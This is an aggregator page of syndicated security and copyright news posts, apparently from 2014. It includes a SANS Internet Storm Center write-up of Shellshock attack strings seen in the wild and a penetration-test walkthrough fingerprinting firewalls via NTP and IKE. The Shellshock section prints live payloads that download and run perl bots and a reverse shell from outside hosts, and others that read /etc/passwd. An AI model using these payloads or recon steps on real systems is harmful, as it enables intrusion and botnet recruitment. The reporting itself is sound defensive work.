Posts tagged ‘ip address’

SANS Internet Storm Center, InfoCON: yellow: Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Content-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn’t escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an “empty page” message.

) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

 

2 – Bots using the shellshock vulnerability:

This one installs a simple perl bot that connects to irc.hacker-newbie.org on port 6667, channel #bug.

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

3 – Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 – Using multiple headers to install a perl reverse shell (the shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 – Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"
Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"

6 – User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*
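
For defenders, one handy property of all of these probes is that they share the same telltale bash function-definition prefix, "() {", somewhere in an HTTP header. The following is a minimal log-grepping sketch in Python (the log path in the usage comment is just an example; point it at whatever access or error logs your web server actually writes):

import re
import sys

# The "() {" function-definition prefix that Shellshock probes carry,
# allowing for optional whitespace between the tokens.
SHELLSHOCK = re.compile(r"\(\)\s*\{")

def scan(path):
    # Print every log line that looks like a Shellshock probe.
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if SHELLSHOCK.search(line):
                print("%s:%d: %s" % (path, lineno, line.rstrip()))

if __name__ == "__main__":
    # Example usage: python shellshock_grep.py /var/log/apache2/access.log
    for logfile in sys.argv[1:]:
        scan(logfile)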

 

 


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Gottfrid Svartholm Trial: IT Experts Give Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice continued this week in Copenhagen, Denmark. While Gottfrid is well known as a founder of The Pirate Bay, his co-defendant’s identity is still being kept out of the media.

In what’s being described as the largest case of its kind ever seen in the Scandinavian country, both stand accused of hacking computer mainframes operated by US IT giant CSC. This week various IT experts have been taking the stand.

On Tuesday, IT investigator Flemming Grønnemose appeared for the third time and stated that during the summer and fall of 2012, Swedish police had tipped off Danish police about possible hacker attacks against CSC.

According to DR.dk, as part of Grønnemose’s questioning Gottfrid’s lawyer Luise Høj raised concerns over a number of changes that had taken place on her client’s computer since it had been taken into police custody.

Grønnemose admitted that when police installed programs of their own onto the device, security holes which could have been exploited for remote control access could have been closed. However, it appears police also have an exact copy of the machine in an unmodified state.

Further evidence centered around the IP addresses that were traced during the attacks. IP addresses from several countries were utilized by the attackers including those in Cambodia, Germany, Iran, Spain and the United States. German police apparently investigated the local IP address and found that it belonged to a hacked server in a hosting facility.

The server had not been rented out for long, but was still on and had been taken over by hackers, Grønnemose said. According to the prosecution, the same server also featured in last year’s Logica case in Sweden. Gottfrid was found guilty in that case and sentenced to two years in jail.

Another IT expert called to give evidence on the same day was Allan Lund Hansen who had examined the files found on Gottfrid’s computer. Those files, garnered from the CSC hack, contained thousands of names, addresses and social security numbers of Danish citizens. Since the files were in an encrypted folder along with data from earlier attacks on IT company Logica and the Nordea bank, the prosecution are linking the files to Gottfrid.

On Thursday, DR.dk reported that the debate over Gottfrid’s computer being remotely controlled continued. Previously Jacob Appelbaum argued that an outside attacker could have used the machine to carry out the attacks but defense experts from the Center for Cyber Security disputed that.

This week Thomas Krismar from the Center said that Python scripts found on Gottfrid’s computer were able to carry out automated tasks but in this case remote control was unlikely to be one of them.

“There are two characteristics we always look for when we try to discover remote control features. The first is one that starts automatically when you turn on your computer since the attacker will always try to maintain their footing on the computer. The second is one that ‘phones home’ to indicate that it is ready to receive commands,” Krismar said.

The script in question on Gottfrid’s machine needed to be started manually and did not attempt to make contact with anything on the web, the expert said.

Also appearing Thursday were further witnesses including Joachim Persson of Stockholm police who investigated Gottfrid’s computers after his arrest in Cambodia.

Persson said he found a tool known as Hercules, a sophisticated piece of software that emulates the kind of systems that were hacked at CSC. Persson did note, however, that such tools have legitimate uses for those learning how to operate similar systems.

The trial continues.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Works Like a Charm

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As a software developer, one of my core philosophies is to automate common tasks. If you have to do something more than once, then it is better to automate it.

Of course, there always is that trade-off between the time to automate and the time saved. If a two-minute task takes 20 hours to automate, then it’s probably faster (and a better use of your time) to do it manually when needed. However, if you need to do it hundreds of times, then it’s better to spend 20 hours automating it.

Sometimes you may not even realize how often you do a task. All of those minutes may not seem like much, but they can really add up.

Work Harder, Not Smarter

FotoForensics is currently receiving over 1,000 unique pictures per day. We’re at the point where we can either (A) hire more administrators, or (B) simplify existing administrative duties.

Recently I’ve been taking a closer look at some of the tasks we manually perform. Things like categorizing content for various research projects, identifying trends, scanning content for “new” features that run the gamut from new devices to new attacks, reviewing flagged content, and responding to user requests. A lot of these tasks are time consuming and performed more than once. And a few of them can be automated.

Blacklists
Network abuses come in many different forms. Users may upload prohibited content, automate submissions, attack the site with port scans and vulnerability tests, or submit comment-spam to our contact form. It’s always a good idea to check abusers against known blacklists. This tells me whether the abuse is widespread or whether my site is just special.

There are a bunch of servers that run DNS-based blacklists. They all work in similar ways:

  1. You encode the query as a hostname. Like “2.1.9.127.dnsbl.whatever”. This encodes the IP address in reverse-notation: 127.9.1.2.
  2. You perform a DNS hostname lookup.
  3. The DNS result encodes the response as an IP address. Different DNSBL servers have different encoded values, but they typically report suspicious behavior, known proxies, and spammers.
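
As a rough illustration of those three steps, here is a minimal Python sketch. The zone dnsbl.example.org is a placeholder for whichever DNSBL you actually query, and the meaning of the returned 127.0.0.x codes varies from list to list, as noted above:

import socket

def dnsbl_lookup(ip, zone="dnsbl.example.org"):
    # Step 1: reverse the octets and append the DNSBL zone,
    # so 127.9.1.2 becomes 2.1.9.127.dnsbl.example.org.
    query = ".".join(reversed(ip.split("."))) + "." + zone
    try:
        # Steps 2 and 3: an ordinary A-record lookup; the answer
        # (typically 127.0.0.x) encodes the listing reason.
        return socket.gethostbyname(query)
    except socket.gaierror:
        return None  # NXDOMAIN: the address is not listed

if __name__ == "__main__":
    print(dnsbl_lookup("127.9.1.2"))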

Some DNSBL servers seem too focused for my use. For example, if they only report known-spam systems and not proxies or malware, then they will rarely return a match for my non-spam queries. Other DNSBL systems seem to have dated content, with lists of proxies that have not been active for years. (One system will quickly add proxies but won’t remove them without a request. So dead proxies remain listed indefinitely.)

Most DNSBL servers focus on anti-spam. They report whether the address was used to send spam, harvest addresses, or other related actions. Ideally, I’d like a DNSBL that focuses on other hostile activities: network scanners, attackers, and proxies. But for now, looking for other abuses, like harvesters and comment-spam, is good enough.

Anonymous Proxies
I believe that anonymous proxies are important. They permit whistle-blowers to make anonymous reports and allow people to discuss personal issues without the fear of direct retribution. Groups like “Alcoholics Anonymous” would not be as successful if members had to be fully outed.

Unfortunately, anonymity also permits abuses. The new automated system downloads the list of TOR nodes daily. This allows us to easily check if a ban is tied to a TOR node. We don’t ban every TOR node. Instead, we only ban the nodes used for uploading prohibited content to the site.

For beginner TOR users, this may not make sense. Banning one node won’t stop the problem since the user will just change nodes. Except… Not all TOR nodes are equal. Nodes that can handle a higher load are given a higher weight and are more likely to carry traffic. We’ve only banned about 300 of the 6,100 TOR nodes, but that seems to have stopped most abuses from TOR. (And best yet: only about a dozen of these bans were manually performed — most were caught by our auto-ban system.)
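
For anyone wanting to replicate the daily “is this ban a Tor node?” check, a short sketch follows. The exit-list URL is an assumption — the Tor Project has published its bulk exit list at a couple of locations over the years, so verify the current address before relying on it:

import urllib.request

# Assumed location of the Tor Project's bulk exit list (one IP per line);
# confirm the current URL before using this for real decisions.
EXIT_LIST_URL = "https://check.torproject.org/torbulkexitlist"

def fetch_exit_nodes():
    # Download the current set of Tor exit-node IP addresses.
    with urllib.request.urlopen(EXIT_LIST_URL, timeout=30) as resp:
        lines = resp.read().decode().splitlines()
    return {line.strip() for line in lines if line.strip()}

if __name__ == "__main__":
    nodes = fetch_exit_nodes()
    banned_ip = "192.0.2.10"  # example address to test
    print(banned_ip, "is a Tor exit node:", banned_ip in nodes)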

Automating History
The newly automated system also scans the logs for our own ban records and for any actions taken after the ban was issued. I can tell if the network address is associated with network attacks or if the user just uploaded prohibited content. I can also tell if the user attempted to avoid the ban.

I recently had one person request a ban-removal. He claimed that he didn’t know why he was banned. After looking at the automated history report, I decided to leave the ban in place and not respond to him. But I was very tempted to write something like: “Dude… You were banned three seconds after you uploaded that picture. You saw the ban message that said to read the FAQ, and you read it twelve seconds later. Then you reloaded eight times, switched browsers, switched computers, and then tried to avoid the ban by changing your network address. And now you’re claiming that you don’t know why you were banned? Yeah, you’re still banned.”

Performing a full history search through the logs for information related to a ban used to take minutes. Now it takes one click.

NCMEC Reports
The word forensics means “relating to the use of scientific knowledge or methods in solving crimes” or “relating to, used in, or suitable to a court of law”. When you see a forensic system, you know it is geared toward crime detection and legal issues.

And people who deal in child exploitation photos know that their photos are illegal. Yet, some people are stupid enough to upload illegal pictures to FotoForensics.

The laws regarding these pictures are very explicit: we must report pictures related to child abuse and exploitation to the CyberTipline at the National Center for Missing and Exploited Children (NCMEC).

While I don’t mind the reporting requirement, I don’t like the report form. The current online form has dozens of fields and takes me more than 6 minutes to complete each time I need to submit a report. I need to gather the picture(s), information about the submitter, and other related log information. Some reports have a lot of files to attach, so they can take 12 minutes or more to complete. The total time I’ve spent using this form in the last year can be measured in days.

I’ve finally had enough of the manual submission process. I just spent a few days automating it from my side. It’s a PHP script that automatically logs in (for the session tokens), grabs the form (for the fields and any pre-populated values), fills out the data, attaches files, and submits it. It also automatically writes a short report (that I can edit with more information), records the confirmation information, and archives the stuff I am legally required to retain.
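
The general shape of that kind of script — log in to establish a session, pull down the form so any pre-populated hidden fields are preserved, then POST the data and attachments — looks roughly like the Python sketch below. Every URL and field name here is invented for illustration; the real CyberTipline form has its own fields, session handling and terms of use:

import re
import requests  # third-party: pip install requests

BASE = "https://reports.example.org"  # hypothetical reporting site

def submit_report(username, password, report_fields, attachments):
    s = requests.Session()
    # 1. Log in so the session cookie/token is established.
    s.post(BASE + "/login", data={"user": username, "pass": password})
    # 2. Fetch the blank form and keep any pre-populated hidden inputs.
    form_html = s.get(BASE + "/report/new").text
    hidden = dict(re.findall(
        r'<input[^>]+type="hidden"[^>]+name="([^"]+)"[^>]+value="([^"]*)"',
        form_html))
    # 3. Merge our data over the hidden values and submit with attachments.
    payload = dict(hidden, **report_fields)
    files = [("attachment", open(path, "rb")) for path in attachments]
    resp = s.post(BASE + "/report/submit", data=payload, files=files)
    return resp.status_code, resp.text  # confirmation page to archive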

Instead of taking me 6+ minutes for each report, it now takes about 3 seconds. This simplifies the entire reporting process and significantly reduces the ick-factor.

Will Work for Work

A week of programming effort (spread over three weeks) has allowed me to reduce the overhead. Administrative tasks that would take a few hours each day now take minutes.

There’s still a good number of tasks that can be automated. This includes spotting certain types of pictures that are currently being included in specific research projects, and some automated classification. I can probably add in a little more automated NCMEC reporting, for those common cases where there is no need for a manual confirmation.

Eventually I will need to get a more powerful server and maybe bring on more help. But for right now, simply automating common tasks makes the current server very manageable.

SANS Internet Storm Center, InfoCON: green: Strange ICMP traffic seen in destination, (Sat, Sep 20th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Reader Ronnie provided us today a packet capture with a very interesting situation:

  1. Several packets are arriving, all ICMP echo requests from unrelated addresses:
    ICMP sources
  2. None of the ICMP packets sent to the destination address carries any data, leaving just the 20-byte IP header and the 8-byte ICMP echo request header
    ICMP data
  3. Each of the unrelated addresses sent 6 packets: one with a normal TTL and 5 with incrementing TTLs:
    6 ICMP packets for each destination

These packets appear to be trying to map a route, but in a very particular way. Since many unrelated IP addresses are doing the same thing, something may be mapping routes to a specific address in preparation for something not good. The destination IP address is an ADSL client.
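
If you want to check your own traffic for the same pattern, a small sketch using scapy (a third-party Python packet library) can flag ICMP echo requests that arrive with no payload at all — the working assumption being that normal ping implementations almost always include some data:

from scapy.all import sniff, IP, ICMP, Raw  # third-party: pip install scapy

def check(pkt):
    # Flag ICMP echo requests (type 8) that carry no payload.
    if pkt.haslayer(IP) and pkt.haslayer(ICMP) and pkt[ICMP].type == 8 and not pkt.haslayer(Raw):
        print("empty echo request: %s -> %s ttl=%d" % (pkt[IP].src, pkt[IP].dst, pkt[IP].ttl))

if __name__ == "__main__":
    # Needs root/administrator privileges to capture packets.
    sniff(filter="icmp", prn=check, store=False)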

Is anyone else seeing this kind of packet? If you are, we definitely want to hear from you. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Expendables 3 Downloaders Told To Pay Up – Or Else

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Back in July a pretty much pristine copy of The Expendables 3 leaked online. It was a dramatic event for those behind the production as the movie’s premiere on BitTorrent networks trumped its theatrical debut by several weeks.

Distributor Lionsgate was quick to react. Just days after the leak the entertainment company sued several file-sharing sites, which eventually resulted in the closure of file-hosting site Hulkfile. But more action was yet to come.

Doubling up on their efforts, Lionsgate also targeted hosting providers, domain registrars and seedboxes while at the same time sending thousands of DMCA takedown notices to have content and links to content removed.

However, a big question remained unanswered. Would the makers of The Expendables 3 start tracking down alleged file-sharers to force them into cash settlements as happened with previous iterations of the movie? It’s taken a few weeks but confirmation is now in.

Millennium Films, the production company behind The Expendables 3, is now shaking down individual Internet users they believe to have downloaded and shared the leaked movie without permission. What do they want? Hard cash, of course.

Interestingly, and at least for now, the company isn’t going through the courts filing subpoenas against ISPs to obtain downloaders’ personal details. In a switch of tactics the company is sending DMCA takedown notices to ISPs via CEG TEK International and requesting that the notices are forwarded to the customers in question instead. In addition to the usual cease and desist terminology, Millennium tacks on cash settlement demands too.

Expendables 3-notice

As can be seen in the image above, the production company is giving notice recipients until October 5, 2014 to come up with the money – or else.

“If within the prescribed time period described above you fail to (i) respond or settle, or (ii) provide by email to support@cegtek.com written evidence of your having consent or permission from Millennium Films to use the Work in connection with Peer-to-Peer networks (note that fraudulent submissions may give rise to additional liabilities), the above matter may be referred to attorneys representing the Work’s owner for legal action,” the settlement offer reads.

Of course, whether people fill in CEG TEK’s settlement form or write to them with their personal details, the end result will be the same. The company will now have the person’s identity, something they didn’t previously have since at this stage ISPs have only forwarded the notices.

While the notices are real (CEG TEK have confirmed the action), little is known about how much money Millennium/CEG TEK are demanding to make a supposed lawsuit go away. However, TorrentFreak has learned that CEG TEK are simultaneously sending out settlement demands to alleged downloaders of The Expendables 2. A copy of the settlement page demand – $300 – is shown below.

expend2-demand

While some people will no doubt be worrying about how to deal with these demands and whether Millennium will follow through on its implied threat to sue, at least some of these notices will be falling on deaf ears. LiquidVPN, an anonymity company listed in our 2014 report, received one such notice but, as a no-log provider, could not forward it to its customer.

Compare that to the despair of a user posting on KickassTorrents who got caught after relying on IP address blocking software (typos etc corrected).

“I woke up to this alongside four other notices from my ISP. I stopped downloading six days ago, but I’m receiving old notices about movies that were downloaded a month ago and I basically can’t do nothing about it since it’s old. I use PeerBlock and it’s a bunch of bullshit. What should I do with this October 5 deadline on a settlement? Please help!” he wrote.

Finally, and as Lionsgate, Millennium Films and CEG TEK shake down sites, hosting services, domain registrars, seedbox providers and now end users, the most important questions remain unanswered.

Who – at Lionsgate, Millennium or one of its partners – had full access to a clean DVD copy of the movie? Who then put that copy in a position of being placed online? The FBI, who can crack the most complex of terrorist crimes, are reportedly involved and must’ve asked these questions. Yet the culprit still hasn’t been found…

Could it be that studios become less cooperative when blame falls too close to home?

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Dread Pirate Sunk By Leaky CAPTCHA

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Ever since October 2013, when the FBI took down the online black market and drug bazaar known as the Silk Road, privacy activists and security experts have traded conspiracy theories about how the U.S. government managed to discover the geographic location of the Silk Road Web servers. Those systems were supposed to be obscured behind the anonymity service Tor, but as court documents released Friday explain, that wasn’t entirely true: Turns out, the login page for the Silk Road employed an anti-abuse CAPTCHA service that pulled content from the open Internet, thus leaking the site’s true location.

Tor helps users disguise their identity by bouncing their traffic between different Tor servers, and by encrypting that traffic at every hop along the way. The Silk Road, like many sites that host illicit activity, relied on a feature of Tor known as “hidden services.” This feature allows anyone to offer a Web server without revealing the true Internet address to the site’s users.

That is, if you do it correctly, which involves making sure you aren’t mixing content from the regular open Internet into the fabric of a site protected by Tor. But according to federal investigators,  Ross W. Ulbricht — a.k.a. the “Dread Pirate Roberts” and the 30-year-old arrested last year and charged with running the Silk Road — made this exact mistake.

As explained in the Tor how-to, in order for the Internet address of a computer to be fully hidden on Tor, the applications running on the computer must be properly configured for that purpose. Otherwise, the computer’s true Internet address may “leak” through the traffic sent from the computer.
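
One simple way to spot that class of misconfiguration from the operator’s side is to scan the pages a hidden service generates for resources that point at the regular open Internet rather than at the service itself. A rough Python sketch follows; the page URL and onion hostname are placeholders, and it assumes you can already reach the page (for example via a local copy or a Tor-aware proxy):

import re
import urllib.request

def external_resources(page_url, onion_host):
    # Fetch the page and list src/href targets that do not point at the
    # hidden service itself -- each one is content pulled from the open Internet.
    html = urllib.request.urlopen(page_url, timeout=30).read().decode(errors="replace")
    refs = re.findall(r'(?:src|href)=["\'](https?://[^"\']+)', html)
    return [r for r in refs if onion_host not in r]

if __name__ == "__main__":
    for leak in external_resources("http://example.onion/login", "example.onion"):
        print("external resource:", leak)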


And this is how the feds say they located the Silk Road servers:

“The IP address leak we discovered came from the Silk Road user login interface. Upon examining the individual packets of data being sent back from the website, we noticed that the headers of some of the packets reflected a certain IP address not associated with any known Tor node as the source of the packets. This IP address (the “Subject IP Address”) was the only non-Tor source IP address reflected in the traffic we examined.”

“The Subject IP Address caught our attention because, if a hidden service is properly configured to work on Tor, the source IP address of traffic sent from the hidden service should appear as the IP address of a Tor node, as opposed to the true IP address of the hidden service, which Tor is designed to conceal. When I typed the Subject IP Address into an ordinary (non-Tor) web browser, a part of the Silk Road login screen (the CAPTCHA prompt) appeared. Based on my training and experience, this indicated that the Subject IP Address was the IP address of the SR Server, and that it was ‘leaking’ from the SR Server because the computer code underlying the login interface was not properly configured at the time to work on Tor.”

For many Tor fans and advocates, The Dread Pirate Roberts’ goof will no doubt be labeled a noob mistake — and perhaps it was. But as I’ve said time and again, staying anonymous online is hard work, even for those of us who are relatively experienced at it. It’s so difficult, in fact, that even hardened cybercrooks eventually slip up in important and often fateful ways (that is, if someone or something was around at the time to keep a record of it).

A copy of the government’s declaration on how it located the Silk Road servers is here (PDF). A hat tip to Nicholas Weaver for the heads up about this filing.

A snapshot of offerings on the Silk Road.

SANS Internet Storm Center, InfoCON: green: Identifying Firewalls from the Outside-In. Or, “There’s Gold in them thar UDP ports!”, (Thu, Sep 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

In a penetration test, often the key to bypassing a security control is as simple as identifying the platform it’s implemented on.  In other words, it’s a lot easier to get past something if you know what it is.  For instance, quite often you’ll be probing a set of perimeter addresses, and if there are no vulnerable hosts NAT-ed out for you, you might start feeling like you’re at a dead end.   Knowing what those hosts are would be really helpful right about now.  So, what to do next?

Look at UDP, that’s what.  Quite often scanning the entire UDP range will simply burn hours or days with not a lot to show for it, but if you target your scans carefully, you can quite often get some good information in a hurry.

Scanning NTP is a great start.  Way too many folks don’t realize that when you make a network device (a router or switch for instance) an NTP client, quite often you also make it an NTP server as well, and NTP servers love to tell you all about themselves.  All too often that port is left open because nobody knows to block it.  

Another service that quite often bypasses all firewall ACLs is the corporate remote-access IPSEC VPN, specifically IKE/ISAKMP (udp/500).  Even if this is a branch firewall with a site-to-site VPN to head office, often IKE is misconfigured to bypass the interface ACL, or the VPN to head office is enabled with a blanket “any any” permit for IKE.

Let’s take a look at these two services – we’ll use NMAP to dig a little deeper.  First, let’s scan for those ports:

nmap -Pn -sU -p123,500 --open x.x.x.x
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-29 12:13 Eastern Daylight Time

Nmap scan report for some.fqdn.name (x.x.x.x)
Host is up (0.070s latency).
PORT    STATE SERVICE
123/udp open  ntp
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 46.69 seconds

OK, so we found open UDP ports – how does this help us?  Let’s run the SECOND set of scans against these two ports, starting with expanding the NMAP scan to use the ntp-info script:

C: > nmap -Pn -sU -p123 --open x.x.x.x --script=ntp-info.nse

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-29 12:37 Eastern Daylight Time

Nmap scan report for some.fqdn.name (x.x.x.x)
Host is up (0.042s latency).
PORT    STATE SERVICE
123/udp open  ntp
| ntp-info:
|   receive time stamp: 2014-08-29T16:38:51
|   version: 4
|   processor: unknown
|   system: UNIX
|   leap: 0
|   stratum: 4
|   precision: -27
|   rootdelay: 43.767
|   rootdispersion: 135.150
|   peer: 37146
|   refid: 172.16.10.1
|   reftime: 0xD7AB23A5.12F4E3CA
|   poll: 10
|   clock: 0xD7AB2B15.EA066B43
|   state: 4
|   offset: 11.828
|   frequency: 53.070
|   jitter: 1.207
|   noise: 6.862
|_  stability: 0.244

Nmap done: 1 IP address (1 host up) scanned in 48.91 seconds

Oops – ntp-info not only tells us more about our host, it also discloses the NTP server that it’s syncing to – in this case check that host IP in red – that’s an internal host.  In my books, that can be rephrased as “the next target host”, or maybe if not next, at least on the list “for later”.  Interestingly, support for ntp-info requests positions this host nicely to act as an NTP reflector/amplifier, which can then be used in DDOS spoofing attacks.  The send/receive ratio is just under 1:7 (54 bytes sent, 370 received), so not great, but that’s still a 7x amplification which you can spoof.
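
Under the hood, ntp-info is essentially sending an NTP mode 6 (control) “read variables” request and printing the ASCII variable list that comes back. A minimal sketch of that query in Python, assuming a host you are authorized to scan (the target address below is a placeholder), looks like this:

import socket

def ntp_readvar(host, port=123, timeout=5):
    # 12-byte NTP control header: LI=0, version=2, mode=6 (0x16),
    # then opcode 2 = READVAR; remaining fields zeroed.
    query = b"\x16\x02" + b"\x00" * 10
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (host, port))
        data, _ = s.recvfrom(4096)
    # The variable list (version, stratum, refid, ...) follows the 12-byte header.
    return data[12:].decode(errors="replace")

if __name__ == "__main__":
    # Many servers disable mode 6 queries, so expect timeouts from hardened hosts.
    print(ntp_readvar("192.0.2.1"))  # placeholder target address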

Back to the pentest – while ntp-info gives us some good info, it doesn’t specifically tell us what OS our target host is running, so let’s take a look at IKE next, with service detection enabled:

C: > nmap -Pn -sU -p500 -sV --open x.x.x.x

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-29 13:10 Eastern Daylight Time

Nmap scan report for some.fqdn.name (x.x.x.x)
Host is up (0.010s latency).
PORT    STATE SERVICE
500/udp open  isakmp
Service Info: OS: IOS 12.3/12.4; CPE: cpe:/o:cisco:ios:12.3-12.4

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.05 seconds

Ah – very nice!  Nmap correctly tells us that this device is a Cisco router (not an ASA or any other device).

The ike-scan utility should give us some additional IKE info; let’s try that with a few different options.

A basic verbose assess (main mode) gives us nothing:

C: > ike-scan -v x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d68fbcc7d)

Ending ike-scan 1.9: 1 hosts scanned in 0.041 seconds (24.39 hosts/sec).  0 returned handshake; 1 returned notify

Ditto, main mode IKEv2:

C: > ike-scan -v -2 x.x.x.x
DEBUG: pkt len=296 bytes, bandwidth=56000 bps, int=46285 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
—     Pass 1 of 3 completed
—     Pass 2 of 3 completed
—     Pass 3 of 3 completed

Ending ike-scan 1.9: 1 hosts scanned in 2.432 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify

with just nat-t, still nothing:

C: > ike-scan -v --nat-t x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d8198ef48)

Ending ike-scan 1.9: 1 hosts scanned in 0.038 seconds (26.32 hosts/sec).  0 returned handshake; 1 returned notify

Aggressive mode however is a winner-winnner-chicken-dinner!

C: > ike-scan -v -A x.x.x.x
DEBUG: pkt len=356 bytes, bandwidth=56000 bps, int=54857 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x    Aggressive Mode Handshake returned HDR=(CKY-R=ea1b111d4f1622a2)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=2
8800) VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity) VID=afcad71368a1f1c96b8
696fc77570100 (Dead Peer Detection v1.0) VID=1fdcb6004f1722a231f9e4f59b27b857 VI
D=09002689dfd6b712 (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=x.x.x.x) Nonce(20 bytes) Hash(20 bytes)

Ending ike-scan 1.9: 1 hosts scanned in 0.068 seconds (14.71 hosts/sec).  1 returned handshake; 0 returned notify

We see from this that the remote office router (this is what this device is)  is configured for aggressive mode and XAUTH – so in other words, there’s likely a userid and password along with the preshared key to authenticate the tunnel.  Note that ike-scan identifies this host as “Cisco unity”, so while it gives us some new information, for basic device identification, in this case NMAP gave us better info.

